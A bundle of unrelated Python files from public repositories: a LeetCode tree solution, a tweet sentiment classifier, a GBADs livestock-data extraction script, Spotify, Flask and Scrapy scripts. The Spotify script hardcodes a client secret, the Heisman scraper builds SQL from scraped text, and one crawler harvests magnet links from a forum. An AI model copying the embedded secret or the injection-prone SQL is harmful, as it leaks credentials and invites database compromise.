    """A binary-tree node holding a value and optional left/right children."""
    def __init__(self, x):
        self.val = x
        self.left = self.right = None
class Solution(object):
    """LeetCode 993: two values are cousins when their nodes share the same
    depth but have different parents, in a binary tree with unique values."""

    def isCousins(self, root, x, y):
        """Return True iff the nodes holding x and y are cousins.

        :type root: TreeNode
        :type x: int
        :type y: int
        :rtype: bool
        """
        if not root or x == y:
            return False
        # Map every value in the tree to its (depth, parent value) pair.
        node_dict = dict()
        self.dfs(root, None, 0, node_dict)
        depth_x, parent_x = node_dict[x]
        depth_y, parent_y = node_dict[y]
        return depth_x == depth_y and parent_x != parent_y

    def dfs(self, root, pval, level, node_dict):
        """Depth-first walk recording node_dict[value] = (depth, parent value).

        :param root: current node (never None)
        :param pval: value of the parent node, or None at the tree root
        :param level: depth of the current node (root = 0)
        :param node_dict: accumulator mapping value -> (depth, parent value)
        """
        node_dict[root.val] = (level, pval)
        for child in (root.left, root.right):
            if child is not None:
                self.dfs(child, root.val, level + 1, node_dict)
        return
| ljia2/leetcode.py | solutions/tree/993.Cousins.in.Binary.Tree.py | 993.Cousins.in.Binary.Tree.py | py | 1,863 | python | en | code | 0 | github-code | 50 |
9653741486 | import pandas as pd
import numpy as np
import joblib
from pydantic import BaseModel
from sklearn.svm import SVC
from sklearn.feature_extraction.text import CountVectorizer
import re
import nltk
nltk.download('stopwords')
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
#class TweetText(BaseModel):
# tweet: str
class TweetModel:
    """Twitter sentiment classifier.

    Loads a sentiment140-style CSV, builds a stemmed bag-of-words
    representation and trains (or loads from disk) an RBF-kernel SVM.
    """

    def __init__(self):
        # Lazy caches: building the stemmed corpus and fitting the vectorizer
        # over the full dataset is expensive, so each happens at most once.
        self._corpus = None
        self._cv = None
        self.df = pd.read_csv('twitter_new.csv', header=None, encoding='latin-1')
        self.df = self.clean_prepare_dataset()
        self.model_fname_ = 'twitter_sentiment_model.pkl'
        try:
            self.model = joblib.load(self.model_fname_)
        except Exception as _:
            # No usable pickle on disk: train from scratch and persist.
            self.model = self._train_model()
            joblib.dump(self.model, self.model_fname_)

    def clean_prepare_dataset(self):
        """Keep only the tweet text (column 5) and label (column 0),
        reordered to [text, sentiment].

        Equivalent to the original insert/drop/rename sequence, in two steps.
        """
        self.df = self.df.loc[:, [5, 0]]
        self.df.columns = ['text', 'sentiment']
        return self.df

    def filteredWord(self):
        """Return the stemmed, stopword-filtered corpus (one string per tweet).

        Cached after the first call; the stemmer and the stopword set are
        built once instead of once per tweet as in the original.
        """
        if self._corpus is not None:
            return self._corpus
        corpus = []
        ps = PorterStemmer()
        stop_words = set(stopwords.words('english'))
        for i in range(0, len(self.df)):
            # Strip @mentions, URLs and non-alphanumerics, collapse whitespace.
            tweet = ' '.join(re.sub("(@[A-Za-z0-9]+)|([^0-9A-Za-z \t])|(\w+:\/\/\S+)", " ", self.df['text'][i]).split())
            tweet = tweet.lower().split()
            tweet = [ps.stem(word) for word in tweet if word not in stop_words]
            corpus.append(' '.join(tweet))
        self._corpus = corpus
        return corpus

    def _train_model(self):
        """Fit the SVM on the bag-of-words features of the full corpus."""
        X = self.cvModel().transform(self.filteredWord()).toarray()
        y = self.df['sentiment']
        svc = SVC(kernel='rbf')
        return svc.fit(X, y)

    def cvModel(self):
        """Return the fitted CountVectorizer (fit once, then cached).

        The original refitted the vectorizer on every call — including once
        per prediction — re-vectorizing the whole corpus each time.
        """
        if self._cv is None:
            cv = CountVectorizer(max_features=1500)
            self._cv = cv.fit(self.filteredWord())
        return self._cv

    def predict_sentiment(self, tweet):
        """Predict the sentiment label for a single raw tweet string."""
        tweet_in = [tweet]  # the vectorizer expects an iterable of documents
        tweet_in = self.cvModel().transform(tweet_in).toarray()
        prediction = self.model.predict(tweet_in)
        return prediction[0]
| alok449/twitter-sentiment-analysis | nlpmodel.py | nlpmodel.py | py | 2,867 | python | en | code | 0 | github-code | 50 |
15673482668 | #%% About
'''
We will prefer to get data from the Informatics team API.
For documentation see http://gbadske.org:9000/dataportal/
'''
#%% Packages and functions
import inspect
import io
import os    # used by datainfo() and the export steps below (was previously missing)
import time  # used by datainfo() for the file timestamp (was previously missing)

import pandas as pd
import requests as req # For sending HTTP requests
# To clean up column names in a dataframe
def cleancolnames(INPUT_DF):
    '''Normalise the column names of INPUT_DF in place.

    Lowercases, strips, turns spaces into underscores, maps most punctuation
    to underscores, and spells out a few special characters as words
    (> -> _gt_, < -> _lt_, = -> _eq_, @ -> _at_, $ -> _dol_, % -> _pct_,
    & -> _and_). Mutates INPUT_DF and returns None.
    '''
    underscore_chars = ['/', '\\', '(', ')', '[', ']', '{', '}',
                        '!', '?', '-', '+', '^', '*', '.', ',', '|', '#']
    word_substitutions = [('>', '_gt_'), ('<', '_lt_'), ('=', '_eq_'),
                          ('@', '_at_'), ('$', '_dol_'), ('%', '_pct_'),
                          ('&', '_and_')]
    cols = INPUT_DF.columns.str.lower().str.strip().str.replace(' ', '_', regex=False)
    for ch in underscore_chars:
        cols = cols.str.replace(ch, '_', regex=False)
    for ch, word in word_substitutions:
        cols = cols.str.replace(ch, word, regex=False)
    INPUT_DF.columns = cols
    return None
# To print df.info() with header for readability, and optionally write data info to text file
def datainfo(
        INPUT_DF
        ,OUTFOLDER=None     # String (opt): folder to output {dataname}_info.txt. If None, no file will be created.
    ):
    '''Print a labeled header plus INPUT_DF.info(); optionally write the same
    summary to {dataname}_info.txt inside OUTFOLDER. Returns None.
    '''
    funcname = inspect.currentframe().f_code.co_name
    # Find the module-global variable name bound to this dataframe. Falls back
    # to 'unnamed' instead of crashing (the original raised IndexError when
    # the frame was not a module-level global, e.g. a local or an expression).
    matches = [x for x in globals() if globals()[x] is INPUT_DF]
    dataname = matches[0] if matches else 'unnamed'
    rowcount = INPUT_DF.shape[0]
    colcount = INPUT_DF.shape[1]
    idxcols = str(list(INPUT_DF.index.names))
    header = f"Data name: {dataname :>26s}\nRows: {rowcount :>26,}\nColumns: {colcount :>26,}\nIndex: {idxcols :>26s}\n"
    divider = ('-'*26) + ('-'*11) + '\n'
    bigdivider = ('='*26) + ('='*11) + '\n'
    print(bigdivider + header + divider)
    INPUT_DF.info()
    print(divider + f"End: {dataname:>26s}\n" + bigdivider)
    if OUTFOLDER:     # If something has been passed to OUTFOLDER parameter
        # Bug fix: the original built `filename` but then wrote a literal
        # "(unknown).txt"; use the intended {dataname}_info.txt name.
        filename = f"{dataname}_info"
        tofile = os.path.join(OUTFOLDER, f"{filename}.txt")
        print(f"\n<{funcname}> Creating file {tofile}")
        datetimestamp = 'Created on ' + time.strftime('%Y-%m-%d %X', time.gmtime()) + ' UTC' + '\n'
        buffer = io.StringIO()
        INPUT_DF.info(buf=buffer, max_cols=colcount)
        filecontents = header + divider + datetimestamp + buffer.getvalue()
        with open(tofile, 'w', encoding='utf-8') as f:
            f.write(filecontents)
        print(f"<{funcname}> ...done.")
    return None
#%% View tables and field names

# =============================================================================
#### Get list of all available tables
# =============================================================================
gbadske_tablelist_uri = 'http://gbadske.org:9000/GBADsTables/public?format=text'
# NOTE(review): this issues an HTTP request at import time, so importing the
# module requires network access; consider wrapping it in a function.
gbadske_tablelist = req.get(gbadske_tablelist_uri).text.split(',')   # Get table list and convert to list

# ----------------------------------------------------------------------------
# Lookup the column names in a specific table
# ----------------------------------------------------------------------------
gbadske_fieldnames_uri = 'http://gbadske.org:9000/GBADsTable/public'
# Return the column names for a table
# Usage: table_columns = gbadske_get_column_names(table)
def gbadske_get_column_names(
        TABLE_NAME            # String: name of table
        ,RESP_TYPE='list'     # String: 'list' returns a list, 'string' returns a string
    ):
    '''Fetch the column names of a GBADs table from the public API.

    Returns a list of names (RESP_TYPE='list'), a comma-separated string
    (RESP_TYPE='string'), or None for any other RESP_TYPE.
    '''
    fieldnames_params = {
        'table_name':TABLE_NAME
        ,'format':'text'
    }
    # Issue the request once and derive both shapes from the same response;
    # the original fetched the URL twice (once per shape).
    fieldnames_str = req.get(gbadske_fieldnames_uri , params=fieldnames_params).text
    if RESP_TYPE == 'list':
        return fieldnames_str.split(',')
    elif RESP_TYPE == 'string':
        return fieldnames_str
#%% Retrieve a table

# Base URI for the public query endpoint; the table name is appended to it.
gbadske_query_uri = 'http://gbadske.org:9000/GBADsPublicQuery/'

# -----------------------------------------------------------------------------
# Pieces (kept as a worked example of the raw request flow)
# -----------------------------------------------------------------------------
# gbadske_query_table_name = 'livestock_countries_biomass'
# gbadske_query_params = {
#     'fields':gbadske_get_column_names(gbadske_query_table_name ,'string')   # All columns in table
#     ,'query':"year=2017 AND member_country='Australia'"   # Note character column value must be in SINGLE QUOTES (double quotes don't work)
#     ,'format':'file'
# }
# gbadske_query_resp = req.get(gbadske_query_uri + gbadske_query_table_name , params=gbadske_query_params)
# # Read table into pandas dataframe
# gbadske_query_df = pd.read_csv(io.StringIO(gbadske_query_resp.text))

# -----------------------------------------------------------------------------
# Function
# -----------------------------------------------------------------------------
# Return a table as a pandas dataframe
# Usage: table_df = gbadske_import_to_pandas(tablename)
def gbadske_import_to_pandas(
        TABLE_NAME    # String: name of table
        ,QUERY=""     # String (optional): data query in DOUBLE QUOTES. Values for character columns value must be in SINGLE QUOTES e.g. QUERY="year=2017 AND member_country='Australia'".
    ):
    '''Download a full GBADs table (optionally filtered by QUERY) as a DataFrame.

    Returns an empty DataFrame and prints a message when the HTTP request fails.
    '''
    funcname = inspect.currentframe().f_code.co_name
    query_params = {
        'fields':gbadske_get_column_names(TABLE_NAME ,'string')
        ,'query':QUERY
        ,'format':'file'
    }
    query_resp = req.get(gbadske_query_uri + TABLE_NAME , params=query_params)
    if query_resp.status_code != 200:
        print(f'<{funcname}> HTTP query error.')
        return pd.DataFrame()
    # Parse the CSV payload straight from the response body.
    return pd.read_csv(io.StringIO(query_resp.text))
#%% Get tables needed for AHLE

# NOTE(review): RAWDATA_FOLDER and PRODATA_FOLDER are never defined in this
# file — presumably injected by a driver script that exec's this module;
# confirm before running standalone.
get_years = range(2000 ,2022)

# =============================================================================
#### livestock_countries_biomass
# 2022-8-4: Guelph says this is the correct table to use
# =============================================================================
# Get data for range of years (one API call per year)
livestock_countries_biomass_cols = gbadske_get_column_names('livestock_countries_biomass')
livestock_countries_biomass = pd.DataFrame()   # Initialize
for i in get_years:
    single_year = gbadske_import_to_pandas('livestock_countries_biomass' ,QUERY=f"year={i}")
    livestock_countries_biomass = pd.concat([livestock_countries_biomass ,single_year] ,ignore_index=True)

# -----------------------------------------------------------------------------
# Cleanup
# -----------------------------------------------------------------------------
# Change columns to numeric
convert_cols_to_numeric = ['year' ,'population' ,'biomass']
for COL in convert_cols_to_numeric:
    livestock_countries_biomass[COL] = pd.to_numeric(livestock_countries_biomass[COL] ,errors='coerce')  # Use to_numeric to handle remaining values like ':'

# For Ducks, liveweight is in grams. Change to kg.
_row_selection = (livestock_countries_biomass['species'].str.upper() == 'DUCKS') & (livestock_countries_biomass['liveweight'] > 1000)
print(f"> Selected {_row_selection.sum(): ,} rows.")
livestock_countries_biomass.loc[_row_selection ,'liveweight'] = livestock_countries_biomass.loc[_row_selection ,'liveweight'] / 1000

# Recalculate biomass as population * liveweight (only for the converted rows)
livestock_countries_biomass.loc[_row_selection ,'biomass'] = \
    livestock_countries_biomass.loc[_row_selection ,'liveweight'] * livestock_countries_biomass.loc[_row_selection ,'population']

# Remove duplicates (country-species-year combinations that appear twice)
csy_counts = livestock_countries_biomass[['country' ,'species' ,'year']].value_counts()
biomass_countries = list(livestock_countries_biomass['country'].unique())
livestock_countries_biomass = livestock_countries_biomass.drop_duplicates(
    subset=['country' ,'species' ,'year']   # List (opt): only consider these columns when identifying duplicates. If None, consider all columns.
    ,keep='first'                           # String: which occurrence to keep, 'first' or 'last'
)

datainfo(livestock_countries_biomass)
lcb_years = livestock_countries_biomass['year'].value_counts()

# Profile
# profile = livestock_countries_biomass.profile_report()
# profile.to_file(os.path.join(RAWDATA_FOLDER ,'livestock_countries_biomass_profile.html'))

# Export
livestock_countries_biomass.to_csv(os.path.join(RAWDATA_FOLDER ,'livestock_countries_biomass.csv') ,index=False)
livestock_countries_biomass.to_pickle(os.path.join(PRODATA_FOLDER ,'livestock_countries_biomass.pkl.gz'))
# =============================================================================
#### livestock_countries_biomass_oie
# 2023-1-9: Liverpool wants to use the WOAH/OIE biomass numbers
# =============================================================================
# Get data for range of years
livestock_countries_biomass_oie_cols = gbadske_get_column_names('livestock_countries_biomass_oie')
livestock_countries_biomass_oie = pd.DataFrame()   # Initialize
for i in get_years:
    single_year = gbadske_import_to_pandas('livestock_countries_biomass_oie' ,QUERY=f"year={i}")
    livestock_countries_biomass_oie = pd.concat([livestock_countries_biomass_oie ,single_year] ,ignore_index=True)
lcbo_years = livestock_countries_biomass_oie['year'].value_counts()

# =============================================================================
#### biomass_oie
# 2023-1-9: Liverpool wants to use the WOAH/OIE biomass numbers
# =============================================================================
# Get data for range of years
biomass_oie_cols = gbadske_get_column_names('biomass_oie')
biomass_oie = pd.DataFrame()   # Initialize
for i in get_years:
    single_year = gbadske_import_to_pandas('biomass_oie' ,QUERY=f"year={i}")
    biomass_oie = pd.concat([biomass_oie ,single_year] ,ignore_index=True)
bo_years = biomass_oie['year'].value_counts()

# Describe frequency of sources by year
bo_sources = biomass_oie[['animal_category', 'year', 'source_data']].value_counts()

# =============================================================================
#### biomass_live_weight_fao
# This update to the biomass data has been downloaded from an Informatics team
# repository containing data that has not yet been added to the public API.
# https://github.com/GBADsInformatics/PPSTheme
# =============================================================================
biomass_live_weight_fao = pd.read_csv(os.path.join(RAWDATA_FOLDER ,'20230116_biomass_live_weight_fao.csv'))
biomass_live_weight_fao = biomass_live_weight_fao.rename(columns={"country_x":"country" ,"live_weight":"liveweight"})

# Limit to same years as other tables
biomass_live_weight_fao = biomass_live_weight_fao.loc[biomass_live_weight_fao['year'].isin(get_years)]

datainfo(biomass_live_weight_fao)

# Compare to livestock_countries_biomass (outer merge keeps rows unique to each side)
check_lcb_vs_blw = pd.merge(
    left=livestock_countries_biomass
    ,right=biomass_live_weight_fao
    ,on=['iso3' ,'species' ,'year']
    ,how='outer'
    ,indicator=True
)
datainfo(check_lcb_vs_blw)
check_lcb_vs_blw['_merge'].value_counts()

check_lcb_vs_blw_specyear = check_lcb_vs_blw.pivot_table(
    index=['species' ,'year']
    ,values=['biomass_x' ,'biomass_y']
    ,aggfunc=['count' ,'sum']
)

# Export
biomass_live_weight_fao.to_csv(os.path.join(RAWDATA_FOLDER ,'biomass_live_weight_fao.csv') ,index=False)
biomass_live_weight_fao.to_pickle(os.path.join(PRODATA_FOLDER ,'biomass_live_weight_fao.pkl.gz'))
# =============================================================================
#### livestock_national_population_biomass_faostat
# 2022-8-4: Guelph says this is out of date
# =============================================================================
# Get data for range of years
# biomass_faostat_cols = gbadske_get_column_names('livestock_national_population_biomass_faostat')
# biomass_faostat = pd.DataFrame()   # Initialize
# for i in get_years:
#     single_year = gbadske_import_to_pandas('livestock_national_population_biomass_faostat' ,QUERY=f"year={i}")
#     biomass_faostat = pd.concat([biomass_faostat ,single_year] ,ignore_index=True)

# Profile
# profile = biomass_faostat.profile_report()
# profile.to_file(os.path.join(RAWDATA_FOLDER ,'biomass_faostat_profile.html'))

# Export
# biomass_faostat.to_csv(os.path.join(RAWDATA_FOLDER ,'livestock_national_population_biomass_faostat.csv') ,index=False)
# biomass_faostat.to_pickle(os.path.join(PRODATA_FOLDER ,'biomass_faostat.pkl.gz'))

# =============================================================================
#### World Bank
# =============================================================================
wb_income = pd.DataFrame()   # Initialize
for i in get_years:
    single_year = gbadske_import_to_pandas('countries_incomegroups_worldbank' ,QUERY=f"year={i}")
    wb_income = pd.concat([wb_income ,single_year] ,ignore_index=True)
datainfo(wb_income)

wb_region = gbadske_import_to_pandas('regions_worldbank')
datainfo(wb_region)

# Export
wb_income.to_csv(os.path.join(RAWDATA_FOLDER ,'wb_income.csv') ,index=False)
wb_income.to_pickle(os.path.join(PRODATA_FOLDER ,'wb_income.pkl.gz'))
wb_region.to_csv(os.path.join(RAWDATA_FOLDER ,'wb_region.csv') ,index=False)
wb_region.to_pickle(os.path.join(PRODATA_FOLDER ,'wb_region.pkl.gz'))

# =============================================================================
#### Geo codes
# =============================================================================
un_geo_codes = gbadske_import_to_pandas('un_geo_codes')
datainfo(un_geo_codes)

# Export
un_geo_codes.to_csv(os.path.join(RAWDATA_FOLDER ,'un_geo_codes.csv') ,index=False)
un_geo_codes.to_pickle(os.path.join(PRODATA_FOLDER ,'un_geo_codes.pkl.gz'))

# =============================================================================
#### countries_adminunits_iso
# =============================================================================
# check_admin = gbadske_import_to_pandas('countries_adminunits_iso')
# NOTE(review): this block downloads the table but the response is never
# parsed or saved — looks like exploratory leftovers; confirm before removal.
gbadske_query_table_name = 'countries_adminunits_iso'
gbadske_query_params = {
    'fields':gbadske_get_column_names(gbadske_query_table_name ,'string')   # All columns in table
    ,'query':""   # Note character column value must be in SINGLE QUOTES (double quotes don't work)
    ,'format':'file'
}
gbadske_query_resp = req.get(gbadske_query_uri + gbadske_query_table_name , params=gbadske_query_params)

# =============================================================================
#### Check others
# =============================================================================
# check_faoprod = gbadske_import_to_pandas('livestock_production_faostat' ,"year=2019")
# check_faoprodanimals = gbadske_import_to_pandas('prodanimals_national_faostat' ,"year=2019")
# check_idtable = gbadske_import_to_pandas('idtable')
# check_country_info = gbadske_import_to_pandas('country_info')
#%% Create summaries
# =============================================================================
#### Write table list to Excel
# =============================================================================
# timerstart('Table and column lists')
# with pd.ExcelWriter(os.path.join(RAWDATA_FOLDER ,'gbadske_tables_20220801.xlsx')) as writer:
# # First sheet: table list
# gbadske_tablelist_df = pd.DataFrame({'table_name':gbadske_tablelist})
# gbadske_tablelist_df.to_excel(writer ,sheet_name='Table List' ,index=False)
# # Subsequent sheets: column list for each table
# for table in gbadske_tablelist:
# print(f'> Processing table {table}')
# collist = gbadske_get_column_names(table)
# collist_df = pd.DataFrame({'column_name':collist})
# sheetname = table.replace('population' ,'pop')
# sheetname_short = sheetname[0:31] # Sheet name must be <= 31 characters
# collist_df.to_excel(writer, sheet_name=sheetname_short ,index=False)
# del collist ,collist_df
# timerstop()
# =============================================================================
#### Write sample of each table to Excel
#!!! Run time 3 hours!!
# When run without a table query (e.g. year=2018), the gbadske API takes a long time to respond
# =============================================================================
# timerstart('Sample of rows from each table')
# with pd.ExcelWriter(os.path.join(RAWDATA_FOLDER ,'gbadske_tables_100rows_20220801.xlsx')) as writer:
# for table in gbadske_tablelist:
# print(f'> Processing table {table}')
# if 'eth' not in table: # Exclude Ethiopia-specific tables
# try:
# table_df = gbadske_import_to_pandas(table).head(100)
# except:
# table_df = pd.DataFrame({'Status':'Error reading table'} ,index=[0])
# sheetname = table.replace('population' ,'pop')
# sheetname_short = sheetname[0:31] # Sheet name must be <= 31 characters
# table_df.to_excel(writer, sheet_name=sheetname_short ,index=False)
# del table_df
# timerstop()
| GBADsInformatics/GBADsLiverpool | Global Aggregate workspace/Code and Control Files/1a_extract_from_gbadske_api.py | 1a_extract_from_gbadske_api.py | py | 17,861 | python | en | code | 0 | github-code | 50 |
17552563298 | # shows acoustic features for tracks for the given artist
# Fetch Spotify audio features (tempo etc.) for the top tracks matching an
# artist name given on the command line (defaults to 'jenn kirby').
from __future__ import print_function # (at top of module)
from spotipy.oauth2 import SpotifyClientCredentials
import json
import spotipy
import time
import sys
import spotipy.util as util
import spotipy.oauth2 as oauth2
# SECURITY: client credentials are hardcoded in source. These should be
# rotated and loaded from environment variables / a config file instead.
CLIENT_ID = "894a0b2883b6401781728255a20a9bde"
CLIENT_SECRET = "610654fe15d44e03b683fd950cbf30af"
credentials = oauth2.SpotifyClientCredentials(
    client_id=CLIENT_ID,
    client_secret=CLIENT_SECRET)
# NOTE(review): get_access_token() is deprecated in newer spotipy releases in
# favour of passing the credentials manager to Spotify() -- confirm version.
token = credentials.get_access_token()
spotify = spotipy.Spotify(auth=token)
# Artist name: everything after the script name, or a default.
if len(sys.argv) > 1:
    artist_name = ' '.join(sys.argv[1:])
else:
    artist_name = 'jenn kirby'
results = spotify.search(q=artist_name, limit=2)
# Collect the track URIs of the (up to 2) search hits.
tids = []
for i, t in enumerate(results['tracks']['items']):
    print(' ', i, t['name'])
    tids.append(t['uri'])
##start = time.time()
# One batched request for the audio features of all collected tracks.
features = spotify.audio_features(tids)
print(features)
# NOTE(review): indexing [0] and [1] assumes the search returned at least two
# tracks; an obscure artist name will raise IndexError here.
print(features[0]['tempo'])
print(features[1]['tempo'])
##delta = time.time() - start
##for feature in features:
##    print(json.dumps(feature, indent=4))
##
##    analysis = spotify._get(feature['analysis_url'])
##
##    print (analysis)
##    print(json.dumps(analysis, indent=4))
##    print()
##print("features retrieved in %.2f seconds" % (delta,))
| kilshaw/Spotify-Remixer | spotipyaudiofetures.py | spotipyaudiofetures.py | py | 1,300 | python | en | code | 0 | github-code | 50 |
34755933789 | from flask_restful import Resource, reqparse
from models.usuario import UsuarioModel
class Usuario(Resource):
    """REST resource for reading and deleting a single user by id."""

    def get(self, id):
        """Return the serialized user with this id, or a not-found message."""
        user = UsuarioModel.find_user(id)
        if not user:
            return {"message": "user not found"}
        return user.json(), 200

    def delete(self, id):
        """Delete the user with this id; 404 when it does not exist."""
        user = UsuarioModel.find_user(id)
        if not user:
            return {"message": "Not a valid user id"}, 404
        try:
            user.delete_user()
        except:
            return {"message": "An error ocurred trying to delete user"}, 500
        return {"message": "User deleted"}, 200
class RegistroUsuario(Resource):
    """REST resource that registers a new user from 'login'/'senha' form data."""

    def post(self):
        atributos = reqparse.RequestParser()
        # BUG FIX: RequestParser's method is add_argument (singular);
        # calling add_arguments raised AttributeError before any request
        # could be parsed.
        atributos.add_argument(
            "login",
            type=str,
            required=True,
            help="The field 'login' cannot be left blank.",
        )
        atributos.add_argument(
            "senha",
            type=str,
            required=True,
            help="The field 'senha' cannot be left blank.",
        )
        dados = atributos.parse_args()
        # Reject duplicate logins up front.
        if UsuarioModel.find_user_by_login(dados["login"]):
            return {"message": f"The login '{dados['login']}' already exists."}, 400
        user = UsuarioModel(**dados)
        # BUG FIX: save_user was referenced but never called, so the new
        # user was never persisted.
        user.save_user()
        return {"message": "User created successfully!"}, 201
| MagnoDutra/flask-restful-api | resources/usuario.py | usuario.py | py | 1,394 | python | en | code | 0 | github-code | 50 |
74269958875 | import re
from libs.base_client import BaseClient
from libs.common import md5
class SeHuaTang(BaseClient):
    """Crawler client for the sehuatang forum listing (fid=103): extracts a
    release code and magnet link from each thread and upserts it into Mongo."""

    def __init__(self):
        super().__init__()
        # Crawl configuration consumed by BaseClient. The URLs/CSS selectors
        # target the live site's markup and must stay exactly as-is.
        self.rule = {
            'start_url': 'forum.php?mod=forumdisplay&fid=103&page=%page',
            'base_url': 'https://www.sehuatang.net',
            'page_rule': {'list': '#threadlisttableid tbody[id^="normalthread"] a.s'},
        }
        self.col = None

    def before_run(self):
        """Open the target MongoDB collection before crawling starts."""
        self.col = self.get_db().get_collection('sehuatang')

    def parse_page(self, response):
        """Extract the code/magnet pair from one thread page.

        Returns the stored record, or None when either piece is missing.
        """
        page = response.doc
        match = re.search(r'([A-Z]+-[0-9]+)', page('#thread_subject').text())
        if not match:
            return None
        alias = match.group(1)
        self.logger.info(f"{response.index}/{response.total}: {alias}.")
        magnet = page('.blockcode li').text().strip()
        if not magnet:
            return None
        record = {'alias': alias, 'magnet_link': magnet, 'download': 0}
        # Upsert keyed on the hashed code so re-crawls do not duplicate rows.
        self.col.update_one({'_id': md5(alias)}, {'$set': record}, True)
        return record
| atzouhua/crawle | clients/av/sehuatang.py | sehuatang.py | py | 1,118 | python | en | code | 1 | github-code | 50 |
18098633302 | from sklearn import datasets
import numpy as np
from matplotlib import pyplot as plt
# Fit linear regression to the Boston housing data with the closed-form
# normal equation: theta = (X^T X)^-1 X^T y.
# NOTE(review): load_boston was removed from scikit-learn in 1.2 -- this
# script requires an older sklearn; confirm the pinned version.
# 1.load sample data.
boston = datasets.load_boston()
X, y = boston.data, boston.target
m, n = np.shape(X)
y = y.reshape(m, 1)
# 2. normalize.
np.set_printoptions(precision=4)
u = np.mean(X, axis=0)
X = X - u
# Population standard deviation of the centred columns.
sigma = np.mean(X**2, axis=0)**.5
X = X / sigma
# add x0.
X = np.hstack((np.ones((m, 1)), X))
theta = (np.linalg.inv(X.T.dot(X))).dot(X.T).dot(y)
h = X.dot(theta)
# Half mean squared error (the standard least-squares cost J).
J = np.sum((h-y)**2) / (2 * m)
print('the min mse is:%s\n' % J)
73702222234 | import time
import datetime
from scrapy.selector import Selector
from scrapy.http import Request
from vtvspider import VTVSpider, get_nodes, extract_list_data, extract_data
import MySQLdb
INSERT_AWARD_RESULTS = 'INSERT INTO sports_awards_results (award_id, category_id, genre, location, season, result_type, participants, created_at, modified_at) VALUES ("%s", "%s", "%s", "%s", "%s", "%s", "%s", now(), now()) ON DUPLICATE KEY UPDATE participants = "%s"'
INSERT_AWARD = 'INSERT INTO sports_awards (id, award_gid, award_title, genre, created_at, modified_at) VALUES (%s, %s, %s, %s, now(), now()) ON DUPLICATE KEY UPDATE award_title = %s'
INSERT_AWARD_HIS = 'INSERT INTO sports_awards_history (award_id, award_gid, category_id, category_gid, genre, season, location, winner_nominee, participants, created_at, modified_at) VALUES ("%s", "%s", "%s", "%s", "%s", "%s", "%s", "%s", "%s", now(), now()) ON DUPLICATE KEY UPDATE participants = "%s"'
def mysql_connection():
    """Open a connection + cursor to the SPORTSDB MySQL database.

    The caller is responsible for closing the returned connection.
    """
    connection = MySQLdb.connect(host = '10.4.18.183', user = 'root', db = 'SPORTSDB')
    cursor = connection.cursor()
    return connection, cursor
def mysql_conn():
    """Open a connection + cursor to the AWARDS MySQL database.

    The caller is responsible for closing the returned connection.
    """
    conne = MySQLdb.connect(host = '10.4.2.187', user = 'root', db = 'AWARDS')
    cursor = conne.cursor()
    return conne, cursor
class HeismanTrophySpider(VTVSpider):
    """Scrapes ESPN's Heisman Trophy winners table and records each season's
    winner in the SPORTSDB (current results) and AWARDS (history) databases."""
    name = 'heisman_trophy_spider'
    start_urls = ['http://espn.go.com/college-football/awards/_/id/9']

    def get_award_id(self, award_title, genre):
        """Return the sports_awards id for award_title, inserting a new row
        (id = current max + 1) when it does not exist yet.

        Fixes over the original:
        * query parameters are passed as real tuples -- a bare string made
          MySQLdb treat each character as a separate parameter;
        * the "already exists" path actually returns the id (it previously
          fell through to an implicit `return None`, so existing awards
          never produced result rows);
        * the insert path returns just the id instead of an (id, gid)
          tuple that callers interpolated whole into their SQL;
        * the connection is committed and always closed.
        """
        connection, cursor = mysql_connection()
        try:
            cursor.execute('select id from sports_awards where award_title = %s',
                           (award_title,))
            row = cursor.fetchone()
            if row:
                return str(row[0])
            cursor.execute('select max(id) from sports_awards')
            row = cursor.fetchone()
            # max() on an empty table yields (None,); start ids at 1 then.
            aw_id = (row[0] or 0) + 1 if row else 1
            aw_gid = "AWARD" + str(aw_id)
            cursor.execute(INSERT_AWARD, (aw_id, aw_gid, award_title, genre, award_title))
            connection.commit()  # MySQLdb does not autocommit
            return aw_id
        finally:
            connection.close()

    def get_player_id(self, player_name, game):
        """Return the gid of the participant matching name/game, or None."""
        connection, cursor = mysql_connection()
        try:
            cursor.execute('select gid from sports_participants where title = %s and game= %s',
                           (player_name, game))
            pid = cursor.fetchone()
        finally:
            connection.close()
        return str(pid[0]) if pid else None

    def get_award_details(self, award_title):
        """Return all (id, award_gid) rows for this title from AWARDS.

        BUG FIX: parameters are a tuple, and the connection is closed in a
        finally block (the old close() after `return` was unreachable).
        """
        conne, cursor = mysql_conn()
        try:
            cursor.execute('select id, award_gid from award_ceremonies where award_title = %s',
                           (award_title,))
            return cursor.fetchall()
        finally:
            conne.close()

    def populate_sports_awards(self, player_name, award_cat, award_title, venue, season, result_type, genre, game):
        """Upsert one winner row into sports_awards_results."""
        aw_id = self.get_award_id(award_title, genre)
        pid = self.get_player_id(player_name, game)
        if aw_id and pid:
            connection, cursor = mysql_connection()
            try:
                # NOTE(review): the module-level INSERT_* templates are filled
                # via % string formatting, not driver parameters; scraped
                # values containing quotes will break/inject the SQL. The
                # templates should be rewritten to use placeholders.
                cursor.execute(INSERT_AWARD_RESULTS % (aw_id, award_cat, genre, str(venue), season, result_type, pid, pid))
                connection.commit()
            finally:
                connection.close()

    def populate_sports_history(self, player_name, award_cat, award_title, venue, season, result_type, genre, game):
        """Upsert one winner row into sports_awards_history (AWARDS DB)."""
        pid = self.get_player_id(player_name, game)
        ids = self.get_award_details(award_title)
        if pid and ids:
            conne, cursor = mysql_conn()
            try:
                cursor.execute(INSERT_AWARD_HIS % (str(ids[0][0]), str(ids[0][1]), "", "", genre, season, str(venue), result_type, pid, pid))
                conne.commit()
            finally:
                conne.close()

    def parse(self, response):
        """Parse the award table: one (year, player) per row; store both the
        current-result and the history record for each winner."""
        hxs = Selector(response)
        game = "football"
        nodes = get_nodes(hxs, '//div[@class="mod-content"]//table[@class="tablehead"]//tr[contains(@class, "row")]')
        for node in nodes:
            year = extract_data(node, './/td[1]//text()')
            player_name = extract_data(node, './/td[2]//text()')
            venue = ""
            season = year
            award_title = 'Heisman Trophy'
            award_cat = '0'
            result_type = 'winner'
            genre = "football{G27}"
            self.populate_sports_awards(player_name, award_cat, award_title, venue, season, result_type, genre, game)
            self.populate_sports_history(player_name, award_cat, award_title, venue, season, result_type, genre, game)
| headrun/SWIFT | SPORTS/sports_spiders/scripts/dev_scripts5/heisman_spider.py | heisman_spider.py | py | 4,648 | python | en | code | 1 | github-code | 50 |
2070367749 | from omni.isaac.gym.vec_env import VecEnvBase
env = VecEnvBase(headless=True)
from franka_move_task import FrankaMoveTask
task = FrankaMoveTask(name="Franka")
